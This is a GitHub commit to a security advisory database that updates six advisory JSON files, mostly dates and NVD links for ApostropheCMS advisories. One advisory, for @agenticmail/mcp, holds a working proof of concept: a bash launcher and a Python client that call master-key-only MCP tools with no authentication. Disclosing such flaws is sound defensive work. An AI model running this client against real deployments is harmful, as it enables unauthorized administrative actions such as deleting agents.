Skip to content

Commit 016ffa2

Browse files
1 parent 844f0c8 commit 016ffa2

6 files changed

Lines changed: 42 additions & 13 deletions

File tree

advisories/github-reviewed/2026/05/GHSA-5f64-7vfc-rcx6/GHSA-5f64-7vfc-rcx6.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-5f64-7vfc-rcx6",
4-
"modified": "2026-05-14T18:27:56Z",
4+
"modified": "2026-06-12T22:02:05Z",
55
"published": "2026-05-14T18:27:56Z",
66
"aliases": [
77
"CVE-2026-45011"
@@ -30,6 +30,10 @@
3030
"type": "WEB",
3131
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-5f64-7vfc-rcx6"
3232
},
33+
{
34+
"type": "ADVISORY",
35+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45011"
36+
},
3337
{
3438
"type": "PACKAGE",
3539
"url": "https://github.com/apostrophecms/apostrophe"
@@ -47,6 +51,6 @@
4751
"severity": "HIGH",
4852
"github_reviewed": true,
4953
"github_reviewed_at": "2026-05-14T18:27:56Z",
50-
"nvd_published_at": null
54+
"nvd_published_at": "2026-06-12T21:16:22Z"
5155
}
5256
}

advisories/github-reviewed/2026/05/GHSA-gf43-24g3-5hw2/GHSA-gf43-24g3-5hw2.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-gf43-24g3-5hw2",
4-
"modified": "2026-05-14T18:27:12Z",
4+
"modified": "2026-06-12T22:02:13Z",
55
"published": "2026-05-14T18:27:12Z",
66
"aliases": [
77
"CVE-2026-45013"
@@ -40,6 +40,10 @@
4040
"type": "WEB",
4141
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-gf43-24g3-5hw2"
4242
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45013"
46+
},
4347
{
4448
"type": "PACKAGE",
4549
"url": "https://github.com/apostrophecms/apostrophe"
@@ -53,6 +57,6 @@
5357
"severity": "HIGH",
5458
"github_reviewed": true,
5559
"github_reviewed_at": "2026-05-14T18:27:12Z",
56-
"nvd_published_at": null
60+
"nvd_published_at": "2026-06-12T21:16:22Z"
5761
}
5862
}

advisories/github-reviewed/2026/05/GHSA-hcwq-x9fw-8cfq/GHSA-hcwq-x9fw-8cfq.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-hcwq-x9fw-8cfq",
4-
"modified": "2026-05-14T16:16:16Z",
4+
"modified": "2026-06-12T22:01:56Z",
55
"published": "2026-05-14T16:16:16Z",
66
"aliases": [
77
"CVE-2026-42853"
@@ -40,6 +40,10 @@
4040
"type": "WEB",
4141
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-hcwq-x9fw-8cfq"
4242
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42853"
46+
},
4347
{
4448
"type": "PACKAGE",
4549
"url": "https://github.com/apostrophecms/apostrophe"
@@ -52,6 +56,6 @@
5256
"severity": "MODERATE",
5357
"github_reviewed": true,
5458
"github_reviewed_at": "2026-05-14T16:16:16Z",
55-
"nvd_published_at": null
59+
"nvd_published_at": "2026-06-12T21:16:21Z"
5660
}
5761
}

advisories/github-reviewed/2026/05/GHSA-pr28-mf3q-qpg6/GHSA-pr28-mf3q-qpg6.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-pr28-mf3q-qpg6",
4-
"modified": "2026-05-14T18:26:45Z",
4+
"modified": "2026-06-12T22:02:09Z",
55
"published": "2026-05-14T18:26:45Z",
66
"aliases": [
77
"CVE-2026-45012"
@@ -40,6 +40,10 @@
4040
"type": "WEB",
4141
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-pr28-mf3q-qpg6"
4242
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45012"
46+
},
4347
{
4448
"type": "PACKAGE",
4549
"url": "https://github.com/apostrophecms/apostrophe"
@@ -52,6 +56,6 @@
5256
"severity": "HIGH",
5357
"github_reviewed": true,
5458
"github_reviewed_at": "2026-05-14T18:26:45Z",
55-
"nvd_published_at": null
59+
"nvd_published_at": "2026-06-12T21:16:22Z"
5660
}
5761
}

advisories/github-reviewed/2026/05/GHSA-rpr9-rxv7-x643/GHSA-rpr9-rxv7-x643.json

Lines changed: 6 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,7 +1,7 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-rpr9-rxv7-x643",
4-
"modified": "2026-05-21T16:59:36Z",
4+
"modified": "2026-06-12T22:02:01Z",
55
"published": "2026-05-14T18:26:27Z",
66
"aliases": [
77
"CVE-2026-44990"
@@ -43,6 +43,10 @@
4343
"type": "WEB",
4444
"url": "https://github.com/apostrophecms/apostrophe/security/advisories/GHSA-rpr9-rxv7-x643"
4545
},
46+
{
47+
"type": "ADVISORY",
48+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44990"
49+
},
4650
{
4751
"type": "WEB",
4852
"url": "https://github.com/apostrophecms/apostrophe/issues/5418"
@@ -63,6 +67,6 @@
6367
"severity": "CRITICAL",
6468
"github_reviewed": true,
6569
"github_reviewed_at": "2026-05-14T18:26:27Z",
66-
"nvd_published_at": null
70+
"nvd_published_at": "2026-06-12T21:16:22Z"
6771
}
6872
}

advisories/github-reviewed/2026/06/GHSA-63gr-g7jc-v8rg/GHSA-63gr-g7jc-v8rg.json

Lines changed: 12 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,14 +1,19 @@
11
{
22
"schema_version": "1.4.0",
33
"id": "GHSA-63gr-g7jc-v8rg",
4-
"modified": "2026-06-09T11:53:48Z",
4+
"modified": "2026-06-12T22:01:50Z",
55
"published": "2026-06-01T13:58:33Z",
66
"aliases": [
77
"CVE-2026-50287"
88
],
99
"summary": "@agenticmail/mcp Missing Authentication for Critical Function",
1010
"details": "# AgenticMail MCP HTTP authorization bypass\n\n## Summary\n\n`@agenticmail/mcp` exposes a Streamable HTTP transport when started with\n`--http` or `MCP_HTTP=1`. In that mode, the `/mcp` endpoint accepts requests\nwithout any HTTP authentication layer. A remote client can initialize a\nsession and call tools directly.\n\nThe problem is that the MCP server also exposes tools documented as requiring\n`AGENTICMAIL_MASTER_KEY`, and the server process forwards those calls using its\nown configured master key. As a result, any client that can reach the MCP HTTP\nport can invoke master-only operations without knowing the master key.\n\n## Impact\n\nAn unauthenticated network client can invoke master-key-only MCP tools through\nthe server, including administrative and gateway actions.\n\nConfirmed with a read-only tool:\n\n- `setup_guide`\n\nThe same path reaches higher-impact tools such as:\n\n- `setup_email_relay`\n- `setup_email_domain`\n- `delete_agent`\n- `cleanup_agents`\n- `send_test_email`\n\n## Affected Code\n\n- `packages/mcp/src/index.ts`\n- `packages/mcp/src/tools.ts`\n- `packages/mcp/README.md`\n\nRelevant observations:\n\n- `packages/mcp/src/index.ts` starts an HTTP server for `/mcp` without\n checking an Authorization header.\n- `packages/mcp/src/tools.ts` marks gateway/admin tools as master-key tools\n and forwards them with the server-side `AGENTICMAIL_MASTER_KEY`.\n- `packages/mcp/README.md` documents that gateway/admin tools require the\n master key.\n\n## Reproduction\n\nUse the bundled one-command PoC runner:\n\n```bash\ncd agenticmail\n./scripts/run_agenticmail_mcp_http_unauth_poc.sh\n```\n\nExpected success output:\n\n```text\n[+] received mcp-session-id without authentication: ...\n[+] tools/call(setup_guide) HTTP status: 200\n[+] SUCCESS: unauthenticated HTTP client invoked MCP tool `setup_guide`\n```\n\n## PoC Files\n\n- [scripts/run_agenticmail_mcp_http_unauth_poc.sh](scripts/run_agenticmail_mcp_http_unauth_poc.sh)\n - One-command wrapper that starts the API, starts MCP in HTTP mode, runs the\n client PoC, and cleans up background processes.\n- [scripts/agenticmail_mcp_http_unauth_poc.py](scripts/agenticmail_mcp_http_unauth_poc.py)\n - Unauthenticated MCP client that sends `initialize` and then calls\n `setup_guide`.\n\n## Inline PoC\n\nThe following PoC is non-destructive. It calls `setup_guide`, which is\ndocumented as a master-key tool but only returns setup guidance.\n\n### `scripts/run_agenticmail_mcp_http_unauth_poc.sh`\n\n```bash\n#!/usr/bin/env bash\nset -euo pipefail\n\nREPO_DIR=\".\"\nPOC=\"scripts/agenticmail_mcp_http_unauth_poc.py\"\n\nAPI_HOST=\"${API_HOST:-127.0.0.1}\"\nAPI_PORT=\"${API_PORT:-}\"\nMCP_PORT=\"${MCP_PORT:-}\"\nMASTER_KEY=\"${AGENTICMAIL_MASTER_KEY:-mk_path4_poc_master}\"\nDATA_DIR=\"${AGENTICMAIL_DATA_DIR:-.poc-data}\"\nLOG_DIR=\"${LOG_DIR:-.poc-logs}\"\n\nmkdir -p \"$DATA_DIR\" \"$LOG_DIR\"\n\nnode_major=\"$(node -p 'Number(process.versions.node.split(\".\")[0])' 2>/dev/null || echo 0)\"\nif (( node_major < 20 )); then\n echo \"[-] Node.js 20+ is required; current node is: $(node -v 2>/dev/null || echo missing)\" >&2\n exit 2\nfi\n\nfind_free_port() {\n python3 - <<'PY'\nimport socket\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.bind((\"127.0.0.1\", 0))\n print(sock.getsockname()[1])\nPY\n}\n\n[[ -n \"$API_PORT\" ]] || API_PORT=\"$(find_free_port)\"\n[[ -n \"$MCP_PORT\" ]] || MCP_PORT=\"$(find_free_port)\"\n\napi_pid=\"\"\nmcp_pid=\"\"\ncleanup() {\n set +e\n [[ -z \"${mcp_pid:-}\" ]] || kill \"$mcp_pid\" 2>/dev/null || true\n [[ -z \"${api_pid:-}\" ]] || kill \"$api_pid\" 2>/dev/null || true\n}\ntrap cleanup EXIT\n\nwait_tcp() {\n local host=\"$1\"\n local port=\"$2\"\n local name=\"$3\"\n for _ in $(seq 1 60); do\n if python3 - \"$host\" \"$port\" >/dev/null 2>&1 <<'PY'\nimport socket\nimport sys\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.settimeout(1)\ntry:\n sock.connect((sys.argv[1], int(sys.argv[2])))\n sys.exit(0)\nexcept Exception:\n sys.exit(1)\nfinally:\n sock.close()\nPY\n then\n echo \"[+] $name is listening: $host:$port\"\n return 0\n fi\n sleep 1\n done\n echo \"[-] Timed out waiting for $name: $host:$port\" >&2\n return 1\n}\n\ncd \"$REPO_DIR\"\n\necho \"[+] Starting AgenticMail API on $API_HOST:$API_PORT\"\n(\n export AGENTICMAIL_API_HOST=\"$API_HOST\"\n export AGENTICMAIL_API_PORT=\"$API_PORT\"\n export AGENTICMAIL_MASTER_KEY=\"$MASTER_KEY\"\n export AGENTICMAIL_DATA_DIR=\"$DATA_DIR\"\n npm run dev:api\n) >\"$LOG_DIR/api.log\" 2>&1 &\napi_pid=\"$!\"\nwait_tcp \"$API_HOST\" \"$API_PORT\" \"AgenticMail API\"\n\necho \"[+] Starting AgenticMail MCP HTTP server on port $MCP_PORT\"\n(\n export AGENTICMAIL_API_URL=\"http://$API_HOST:$API_PORT\"\n export AGENTICMAIL_MASTER_KEY=\"$MASTER_KEY\"\n export AGENTICMAIL_DATA_DIR=\"$DATA_DIR\"\n npm --workspace=@agenticmail/mcp run dev -- --http \"--port=$MCP_PORT\"\n) >\"$LOG_DIR/mcp.log\" 2>&1 &\nmcp_pid=\"$!\"\nwait_tcp \"127.0.0.1\" \"$MCP_PORT\" \"AgenticMail MCP HTTP server\"\n\necho \"[+] Running unauthenticated MCP client PoC\"\npython3 \"$POC\" --url \"http://127.0.0.1:$MCP_PORT/mcp\"\n```\n\n### `scripts/agenticmail_mcp_http_unauth_poc.py`\n\n```python\n#!/usr/bin/env python3\nfrom __future__ import annotations\n\nimport argparse\nimport json\nimport sys\nimport urllib.error\nimport urllib.request\n\n\ndef post_json(url: str, payload: dict, session_id: str | None = None) -> tuple[int, dict, str]:\n data = json.dumps(payload).encode(\"utf-8\")\n headers = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json, text/event-stream\",\n }\n if session_id:\n headers[\"mcp-session-id\"] = session_id\n\n req = urllib.request.Request(url, data=data, headers=headers, method=\"POST\")\n try:\n with urllib.request.urlopen(req, timeout=15) as resp:\n body = resp.read().decode(\"utf-8\", errors=\"replace\")\n return resp.status, dict(resp.headers), body\n except urllib.error.HTTPError as exc:\n body = exc.read().decode(\"utf-8\", errors=\"replace\")\n return exc.code, dict(exc.headers), body\n\n\ndef parse_sse_or_json(body: str) -> list[dict]:\n events: list[dict] = []\n stripped = body.strip()\n if not stripped:\n return events\n if stripped.startswith(\"{\") or stripped.startswith(\"[\"):\n parsed = json.loads(stripped)\n return parsed if isinstance(parsed, list) else [parsed]\n for line in body.splitlines():\n if not line.startswith(\"data:\"):\n continue\n data = line[len(\"data:\") :].strip()\n if not data:\n continue\n try:\n events.append(json.loads(data))\n except json.JSONDecodeError:\n pass\n return events\n\n\ndef main() -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--url\", default=\"http://127.0.0.1:8014/mcp\")\n parser.add_argument(\"--tool\", default=\"setup_guide\")\n args = parser.parse_args()\n\n init_payload = {\n \"jsonrpc\": \"2.0\",\n \"id\": 1,\n \"method\": \"initialize\",\n \"params\": {\n \"protocolVersion\": \"2025-03-26\",\n \"capabilities\": {},\n \"clientInfo\": {\"name\": \"agenticmail-unauth-poc\", \"version\": \"0.1\"},\n },\n }\n\n status, headers, body = post_json(args.url, init_payload)\n print(f\"[+] initialize HTTP status: {status}\")\n print(f\"[+] initialize response body: {body[:500]}\")\n session_id = headers.get(\"mcp-session-id\") or headers.get(\"Mcp-Session-Id\")\n if not session_id:\n print(\"[-] No mcp-session-id header returned\")\n return 2\n print(f\"[+] received mcp-session-id without authentication: {session_id}\")\n\n post_json(args.url, {\n \"jsonrpc\": \"2.0\",\n \"method\": \"notifications/initialized\",\n \"params\": {},\n }, session_id=session_id)\n\n status, _headers, body = post_json(args.url, {\n \"jsonrpc\": \"2.0\",\n \"id\": 2,\n \"method\": \"tools/call\",\n \"params\": {\"name\": args.tool, \"arguments\": {}},\n }, session_id=session_id)\n print(f\"[+] tools/call({args.tool}) HTTP status: {status}\")\n print(\"[+] raw response:\")\n print(body)\n\n if any(\"result\" in msg for msg in parse_sse_or_json(body)):\n print(f\"[+] SUCCESS: unauthenticated HTTP client invoked MCP tool `{args.tool}`\")\n return 0\n\n print(\"[-] Tool call did not return a result\")\n return 1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n```\n\n## Why This Is a Vulnerability\n\nThe project treats `AGENTICMAIL_MASTER_KEY` as the authorization boundary for\nadministrative and gateway operations. HTTP MCP mode removes the client-side\nauthentication boundary entirely, so an unauthenticated network client becomes\nan indirect caller of master-only API functionality.\n\n\n## Suggested Fix\n\n- Require authentication for HTTP MCP mode.\n- Bind the MCP HTTP server to `127.0.0.1` by default.\n- Reject `/mcp` requests that lack a valid bearer token or shared secret.\n- Disable master-key tools when the transport is unauthenticated.",
11-
"severity": [],
11+
"severity": [
12+
{
13+
"type": "CVSS_V4",
14+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
15+
}
16+
],
1217
"affected": [
1318
{
1419
"package": {
@@ -35,6 +40,10 @@
3540
"type": "WEB",
3641
"url": "https://github.com/agenticmail/agenticmail/security/advisories/GHSA-63gr-g7jc-v8rg"
3742
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-50287"
46+
},
3847
{
3948
"type": "WEB",
4049
"url": "https://github.com/agenticmail/agenticmail/commit/7b9b05d973676e9f3d097c08b8e649f59bfc15d0"
@@ -67,6 +76,6 @@
6776
"severity": "HIGH",
6877
"github_reviewed": true,
6978
"github_reviewed_at": "2026-06-01T13:58:33Z",
70-
"nvd_published_at": null
79+
"nvd_published_at": "2026-06-12T20:16:46Z"
7180
}
7281
}

0 commit comments

Comments
 (0)